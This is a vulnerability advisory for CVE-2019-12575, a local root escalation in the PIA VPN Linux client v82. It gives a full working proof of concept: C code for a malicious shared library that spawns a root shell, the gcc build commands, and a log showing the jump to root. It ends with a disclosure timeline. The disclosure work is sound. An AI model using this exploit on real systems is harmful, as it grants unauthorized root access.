-
Notifications
You must be signed in to change notification settings - Fork 30
/
CVE-2019-12575.txt
96 lines (62 loc) · 2.18 KB
/
CVE-2019-12575.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
Title: PIA Linux, macOS Privilege Escalation: Shared Object Injection
Author: Rich Mirch
CVE: CVE-2019-12575
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for Linux could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA Linux binary root_runner.64 is setuid root. This binary executes
/opt/pia/ruby/64/ruby which in turn attempts to load several libraries under
/tmp/ruby-deploy.old/lib. A local unprivileged user can create a malicious
library under this path to execute arbitrary code as the root user.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - Create the following directory
mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
Step 2 - Create woot.c to execute a shell when loaded
cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
Step 3 - compile the malicious library.
gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall \
-shared \
-Wl,-soname,encdb.so.so \
-Wl,-init,woot \
-o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
Step 4 - execute root_runner.64
/opt/pia/root_runner/root_runner.64
Example
user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ ./pia-ruby-exploit.sh
+ LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ cat
+ gcc -fPIC -o woot.o -Wall -c woot.c
+ gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
+ /opt/pia/root_runner/root_runner.64
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#
Timeline:
2018-12-16: Reported to vendor
2018-12-16: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure